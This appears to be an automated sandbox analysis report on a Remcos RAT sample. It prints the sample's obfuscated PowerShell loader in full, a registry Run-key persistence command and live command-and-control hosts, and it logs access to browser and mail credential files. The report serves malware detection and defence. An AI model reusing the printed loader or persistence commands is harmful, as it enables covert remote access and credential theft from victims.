ECrypNTeleTYder ';$Thirdendeal=Overfallen 'BarrhSonatD.stt Othptr n:Chew/Mine/Wifea,tacrTrsktStati SkoeOverrTelti,rne.Mexir,agnoRecr/ ShalDos /Cap SUdd q NonuHy,riRagnr Raat.emiiRefos,okkhFrem. dstBomboD.edcinor ';$Chromophotographic=Overfallen 'soli> Kur ';$Klassikernes130=Overfallen 'Je eI F,leRepaXF nc ';$Adddbr='Malleal';$earlships='\Categorizes.Afg';Indsigelser (Overfallen 'Syzy$Ins,GMisaLDemoo vibBib a Seal Uti:CinnEKse NLag gEnjeR TroODataS llepI teROttoiinglSW.ekeF.amrGermnAbseeKory=Bes $ UdbEAp knKarrvAmar:F yvamanvP etypPat.DTrskAG,netHnenAFel,+Aaer$ Hiseko oA IngR stel PogSTou.hRe,uiFolkPPareSPrea ');Indsigelser (Overfallen ',rei$TwosgQua L errO SpeBdynaAK.ntLRdse:RefriSpe NUn eDTom oH,pemUnmiAElidbDehyl TaxeTeks=Nrin$Va ut LydH CouI OveRConnd Atoe U.sNEksiD ,rbeMania En LDilu.t.orSWavepK ntl leriFrihTDieb( oly$JordcTelehMd drbulloCaroMS eaOGru.P ceahOss OFacetSutuOPsykgClayrD riaH phpT chH EriI HolCGg,e)Ilds ');Indsigelser (Overfallen 'Hemo[B tyN lokEEf.eT Vra. T ssSixtEGeo.r FerVAnaliSv mc o,qe lorpSporoEndai OmbNTheutFilmMCustaAl,oN CroA YelGSkvaE edgr.lbn] Um.: rom: IniSC tre ndeCAffeuTongRTremIOp kt SelY .laP DisR Ge.OKlosTIn io EntCLmleo ell Den Grak= uni Toch[Uph,NCra E HypTSk.l.O,lgsLentE linC SlaUInsuRColoIEn.rtHavvYForsPVelfRDonno airtStikOMicrC.aneORotalSnuftUlvsYTilgpForteWea.]Mois:Le t: ,retBraiLDecrSSeku1Hept2 Mir ');$Thirdendeal=$Indomable[0];$Marinarkologer=(Overfallen 'Stup$ MorgBesklIns OTronb MatAVildL kke:PaasDSpecEInspsTil,EAmphNhockS SkrIMantTOpgrI SteZM rsABildT.apiiEp cOUr,enBedvSA pr=,ambnSproeSemiwKluk-U.deOvi abSoupJPhonESur cBallT oly Fde SR efYVandsSkdstGoutekollM Hie.Tre nT,rmETaubTBro .mo tWpr,pEFagmB Ha,cOverL polihydreBridn rrTAnes ');Indsigelser ($Marinarkologer);Indsigelser (Overfallen 'Tili$OmdeDunpreKhazs Gese innBrygsVaabi NsttNon i OJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Consanguineous% -windowstyle 1 $Aboriginal=(gp -Path 'HKCU:\Software\involving\').Elgkos;%Consanguineous% ($Aboriginal)"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\tmzmicbwjbyewkukqymzvfa"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vpnfiulxxjqjgqiohjztgknpdr"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vpnfiulxxjqjgqiohjztgknpdr"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\gjsxjnwrlsioiwwsrulujxhgmfcdr"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Consanguineous% -windowstyle 1 $Aboriginal=(gp -Path 'HKCU:\Software\involving\').Elgkos;%Consanguineous% ($Aboriginal)"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#enfect tictoc hellebardistens skovrankernes redoblingers soloth #>;$rawboned31='observationsklasser';<#calvinistically brunstiges matroser researched #>;$anisometropic=$booed+$host.ui; function overfallen($subantarctic161){if ($anisometropic) {$fredningerne++;}$ponceau=$lsevrdiges+$subantarctic161.'length'-$fredningerne; for( $unsullenly=4;$unsullenly -lt $ponceau;$unsullenly+=5){$prikkendes=$unsullenly;$cembalister+=$subantarctic161[$unsullenly];$overproductive='mglernes';}$cembalister;}function indsigelser($bullaces){ & ($klassikernes130) ($bullaces);}$resistante=overfallen ' upemrdstohalvz teriantelja el un adogw/forl ';$resistante+=overfallen ' ajs5n.en. eng0 or step(b,nnwchiridystnb dedfy kointewruf sskol uninnt mbt unk chap1vern0none..yto0kolo;kleh librwri.gi rugn d e6ove 4dyve;over ,agdx opf6lage4klas;forf skelrscorvdrif:vate1lith3orga1bogs.ber 0unla)agle unligsynkevurdcl rekhel oples/dane2form0 che1ramb0p on0ublu1b.ll0 udl1top. varefs peisnasrkuldeintefmalpodrifxgr b/best1.ana3 utw1.igt. len0ro,a ';$mbori=overfallen 'forsutelespon,e ibircom,-unamask lgops ecrypnteletyder ';$thirdendeal=overfallen 'barrhsonatd.stt othptr n:chew/mine/wifea,tacrtrsktstati skoeoverrtelti,rne.mexir,agnorecr/ shaldos /cap sudd q nonuhy,riragnr raat.emiirefos,okkhfrem. dstbombod.edcinor ';$chromophotographic=overfallen 'soli> kur ';$klassikernes130=overfallen 'je ei f,lerepaxf nc ';$adddbr='malleal';$earlships='\categorizes.afg';indsigelser (overfallen 'syzy$ins,gmisaldemoo vibbib a seal uti:cinnekse nlag genjer troodatas llepi terottoiinglsw.ekef.amrgermnabseekory=bes $ udbeap knkarrvamar:f yvamanvp etyppat.dtrskag,nethnenafel,+aaer$ hiseko oa ingr stel pogstou.hre,uifolkpparesprea ');indsigelser (overfallen ',rei$twosgqua l erro spebdynaak.ntlrdse:refrispe nun edtom oh,pemunmiaelidbdehyl taxeteks=nrin$va ut lydh coui overconnd atoe u.sneksid ,rbemania en ldilu.t.orswavepk ntl lerifrihtdieb( oly$jordctelehmd drbullocaroms eaogru.p ceahoss ofacetsutuopsykgclayrd riah phpt chh erii holcgg,e)ilds ');indsigelser (overfallen 'hemo[b tyn lokeef.et vra. t sssixtegeo.r fervanalisv mc o,qe lorpsporoendai ombntheutfilmmcustaal,on croa yelgskvae edgr.lbn] um.: rom: inisc tre ndecaffeutongrtremiop kt sely .lap disr ge.oklostin io entclmleo ell den grak= uni toch[uph,ncra e hyptsk.l.o,lgslente linc slauinsurcoloien.rthavvyforspvelfrdonno airtstikomicrc.aneorotalsnuftulvsytilgpfortewea.]mois:le t: ,retbraildecrsseku1hept2 mir ');$thirdendeal=$indomable[0];$marinarkologer=(overfallen 'stup$ morgbesklins otronb matavildl kke:paasdspeceinspstil,eamphnhocks skrimanttopgri stezm rsabildt.apiiep cour,enbedvsa pr=,ambnsproesemiwkluk-u.deovi absoupjphonesur cballt oly fde sr efyvandsskdstgoutekollm hie.tre nt,rmetaubtbro .mo twpr,pefagmb ha,coverl polihydrebridn rrtanes ');indsigelser ($marinarkologer);indsigelser (overfallen 'tili$omdedunprekhazs gese innbrygsvaabi nsttnon i o
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#enfect tictoc hellebardistens skovrankernes redoblingers soloth #>;$rawboned31='observationsklasser';<#calvinistically brunstiges matroser researched #>;$anisometropic=$booed+$host.ui; function overfallen($subantarctic161){if ($anisometropic) {$fredningerne++;}$ponceau=$lsevrdiges+$subantarctic161.'length'-$fredningerne; for( $unsullenly=4;$unsullenly -lt $ponceau;$unsullenly+=5){$prikkendes=$unsullenly;$cembalister+=$subantarctic161[$unsullenly];$overproductive='mglernes';}$cembalister;}function indsigelser($bullaces){ & ($klassikernes130) ($bullaces);}$resistante=overfallen ' upemrdstohalvz teriantelja el un adogw/forl ';$resistante+=overfallen ' ajs5n.en. eng0 or step(b,nnwchiridystnb dedfy kointewruf sskol uninnt mbt unk chap1vern0none..yto0kolo;kleh librwri.gi rugn d e6ove 4dyve;over ,agdx opf6lage4klas;forf skelrscorvdrif:vate1lith3orga1bogs.ber 0unla)agle unligsynkevurdcl rekhel oples/dane2form0 che1ramb0p on0ublu1b.ll0 udl1top. varefs peisnasrkuldeintefmalpodrifxgr b/best1.ana3 utw1.igt. len0ro,a ';$mbori=overfallen 'forsutelespon,e ibircom,-unamask lgops ecrypnteletyder ';$thirdendeal=overfallen 'barrhsonatd.stt othptr n:chew/mine/wifea,tacrtrsktstati skoeoverrtelti,rne.mexir,agnorecr/ shaldos /cap sudd q nonuhy,riragnr raat.emiirefos,okkhfrem. dstbombod.edcinor ';$chromophotographic=overfallen 'soli> kur ';$klassikernes130=overfallen 'je ei f,lerepaxf nc ';$adddbr='malleal';$earlships='\categorizes.afg';indsigelser (overfallen 'syzy$ins,gmisaldemoo vibbib a seal uti:cinnekse nlag genjer troodatas llepi terottoiinglsw.ekef.amrgermnabseekory=bes $ udbeap knkarrvamar:f yvamanvp etyppat.dtrskag,nethnenafel,+aaer$ hiseko oa ingr stel pogstou.hre,uifolkpparesprea ');indsigelser (overfallen ',rei$twosgqua l erro spebdynaak.ntlrdse:refrispe nun edtom oh,pemunmiaelidbdehyl taxeteks=nrin$va ut lydh coui overconnd atoe u.sneksid ,rbemania en ldilu.t.orswavepk ntl lerifrihtdieb( oly$jordctelehmd drbullocaroms eaogru.p ceahoss ofacetsutuopsykgclayrd riah phpt chh erii holcgg,e)ilds ');indsigelser (overfallen 'hemo[b tyn lokeef.et vra. t sssixtegeo.r fervanalisv mc o,qe lorpsporoendai ombntheutfilmmcustaal,on croa yelgskvae edgr.lbn] um.: rom: inisc tre ndecaffeutongrtremiop kt sely .lap disr ge.oklostin io entclmleo ell den grak= uni toch[uph,ncra e hyptsk.l.o,lgslente linc slauinsurcoloien.rthavvyforspvelfrdonno airtstikomicrc.aneorotalsnuftulvsytilgpfortewea.]mois:le t: ,retbraildecrsseku1hept2 mir ');$thirdendeal=$indomable[0];$marinarkologer=(overfallen 'stup$ morgbesklins otronb matavildl kke:paasdspeceinspstil,eamphnhocks skrimanttopgri stezm rsabildt.apiiep cour,enbedvsa pr=,ambnsproesemiwkluk-u.deovi absoupjphonesur cballt oly fde sr efyvandsskdstgoutekollm hie.tre nt,rmetaubtbro .mo twpr,pefagmb ha,coverl polihydrebridn rrtanes ');indsigelser ($marinarkologer);indsigelser (overfallen 'tili$omdedunprekhazs gese i
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%consanguineous% -windowstyle 1 $aboriginal=(gp -path 'hkcu:\software\involving\').elgkos;%consanguineous% ($aboriginal)"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#enfect tictoc hellebardistens skovrankernes redoblingers soloth #>;$rawboned31='observationsklasser';<#calvinistically brunstiges matroser researched #>;$anisometropic=$booed+$host.ui; function overfallen($subantarctic161){if ($anisometropic) {$fredningerne++;}$ponceau=$lsevrdiges+$subantarctic161.'length'-$fredningerne; for( $unsullenly=4;$unsullenly -lt $ponceau;$unsullenly+=5){$prikkendes=$unsullenly;$cembalister+=$subantarctic161[$unsullenly];$overproductive='mglernes';}$cembalister;}function indsigelser($bullaces){ & ($klassikernes130) ($bullaces);}$resistante=overfallen ' upemrdstohalvz teriantelja el un adogw/forl ';$resistante+=overfallen ' ajs5n.en. eng0 or step(b,nnwchiridystnb dedfy kointewruf sskol uninnt mbt unk chap1vern0none..yto0kolo;kleh librwri.gi rugn d e6ove 4dyve;over ,agdx opf6lage4klas;forf skelrscorvdrif:vate1lith3orga1bogs.ber 0unla)agle unligsynkevurdcl rekhel oples/dane2form0 che1ramb0p on0ublu1b.ll0 udl1top. varefs peisnasrkuldeintefmalpodrifxgr b/best1.ana3 utw1.igt. len0ro,a ';$mbori=overfallen 'forsutelespon,e ibircom,-unamask lgops ecrypnteletyder ';$thirdendeal=overfallen 'barrhsonatd.stt othptr n:chew/mine/wifea,tacrtrsktstati skoeoverrtelti,rne.mexir,agnorecr/ shaldos /cap sudd q nonuhy,riragnr raat.emiirefos,okkhfrem. dstbombod.edcinor ';$chromophotographic=overfallen 'soli> kur ';$klassikernes130=overfallen 'je ei f,lerepaxf nc ';$adddbr='malleal';$earlships='\categorizes.afg';indsigelser (overfallen 'syzy$ins,gmisaldemoo vibbib a seal uti:cinnekse nlag genjer troodatas llepi terottoiinglsw.ekef.amrgermnabseekory=bes $ udbeap knkarrvamar:f yvamanvp etyppat.dtrskag,nethnenafel,+aaer$ hiseko oa ingr stel pogstou.hre,uifolkpparesprea ');indsigelser (overfallen ',rei$twosgqua l erro spebdynaak.ntlrdse:refrispe nun edtom oh,pemunmiaelidbdehyl taxeteks=nrin$va ut lydh coui overconnd atoe u.sneksid ,rbemania en ldilu.t.orswavepk ntl lerifrihtdieb( oly$jordctelehmd drbullocaroms eaogru.p ceahoss ofacetsutuopsykgclayrd riah phpt chh erii holcgg,e)ilds ');indsigelser (overfallen 'hemo[b tyn lokeef.et vra. t sssixtegeo.r fervanalisv mc o,qe lorpsporoendai ombntheutfilmmcustaal,on croa yelgskvae edgr.lbn] um.: rom: inisc tre ndecaffeutongrtremiop kt sely .lap disr ge.oklostin io entclmleo ell den grak= uni toch[uph,ncra e hyptsk.l.o,lgslente linc slauinsurcoloien.rthavvyforspvelfrdonno airtstikomicrc.aneorotalsnuftulvsytilgpfortewea.]mois:le t: ,retbraildecrsseku1hept2 mir ');$thirdendeal=$indomable[0];$marinarkologer=(overfallen 'stup$ morgbesklins otronb matavildl kke:paasdspeceinspstil,eamphnhocks skrimanttopgri stezm rsabildt.apiiep cour,enbedvsa pr=,ambnsproesemiwkluk-u.deovi absoupjphonesur cballt oly fde sr efyvandsskdstgoutekollm hie.tre nt,rmetaubtbro .mo twpr,pefagmb ha,coverl polihydrebridn rrtanes ');indsigelser ($marinarkologer);indsigelser (overfallen 'tili$omdedunprekhazs gese innbrygsvaabi nsttnon i oJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%consanguineous% -windowstyle 1 $aboriginal=(gp -path 'hkcu:\software\involving\').elgkos;%consanguineous% ($aboriginal)"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_254C2933 cpuid 9_2_254C2933
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_254C2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,9_2_254C2264
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,16_2_004082CD
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0041739B GetVersionExW,14_2_0041739B

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000009.00000002.2951565142.00000000021BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2957967933.00000000095B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5544, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: ESMTPPassword16_2_004033F0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword16_2_00402DB3
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword16_2_00402DB3
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5544, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-JTPTLWJump to behavior
                Source: Yara matchFile source: 00000009.00000002.2951565142.00000000021BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2957967933.00000000095B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5544, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid Accounts1
                Windows Management Instrumentation
                1
                Scripting
                1
                DLL Side-Loading
                1
                Deobfuscate/Decode Files or Information
                1
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API
                1
                DLL Side-Loading
                411
                Process Injection
                2
                Obfuscated Files or Information
                11
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts22
                Command and Scripting Interpreter
                1
                Registry Run Keys / Startup Folder
                1
                Registry Run Keys / Startup Folder
                1
                Install Root Certificate
                1
                Credentials in Registry
                2
                File and Directory Discovery
                SMB/Windows Admin Shares11
                Input Capture
                1
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts1
                PowerShell
                Login HookLogin Hook1
                Software Packing
                NTDS27
                System Information Discovery
                Distributed Component Object Model2
                Clipboard Data
                1
                Remote Access Software
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets41
                Security Software Discovery
                SSHKeylogging2
                Non-Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Masquerading
                Cached Domain Credentials31
                Virtualization/Sandbox Evasion
                VNCGUI Input Capture213
                Application Layer Protocol
                Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Modify Registry
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                Virtualization/Sandbox Evasion
                Proc Filesystem1
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt411
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1536952 Sample: SKM_0001810-01-2024-GL-3762.bat Startdate: 18/10/2024 Architecture: WINDOWS Score: 100 42 renajazinw.duckdns.org 2->42 44 geoplugin.net 2->44 46 artieri.ro 2->46 66 Suricata IDS alerts for network traffic 2->66 68 Found malware configuration 2->68 70 Malicious sample detected (through community Yara rule) 2->70 74 8 other signatures 2->74 9 powershell.exe 18 2->9         started        12 cmd.exe 1 2->12         started        signatures3 72 Uses dynamic DNS services 42->72 process4 signatures5 76 Early bird code injection technique detected 9->76 78 Writes to foreign memory regions 9->78 80 Found suspicious powershell code related to unpacking or dynamic code loading 9->80 82 Queues an APC in another process (thread injection) 9->82 14 msiexec.exe 5 16 9->14         started        19 conhost.exe 9->19         started        84 Suspicious powershell command line found 12->84 21 powershell.exe 14 22 12->21         started        23 conhost.exe 12->23         started        process6 dnsIp7 48 renajazinw.duckdns.org 193.187.91.216, 49742, 49743, 53848 OBE-EUROPEObenetworkEuropeSE Sweden 14->48 50 geoplugin.net 178.237.33.50, 49749, 80 ATOM86-ASATOM86NL Netherlands 14->50 40 C:\ProgramData\remcos\logs.dat, data 14->40 dropped 54 Detected Remcos RAT 14->54 56 Tries to steal Mail credentials (via file registry) 14->56 58 Maps a DLL or memory area into another process 14->58 60 Installs a global keyboard hook 14->60 25 msiexec.exe 2 14->25         started        28 msiexec.exe 1 14->28         started        30 cmd.exe 1 14->30         started        34 2 other processes 14->34 52 artieri.ro 89.44.138.129, 443, 49730, 49731 GTSCEGTSCentralEuropeAntelGermanyCZ Romania 21->52 62 Installs new ROOT certificates 21->62 64 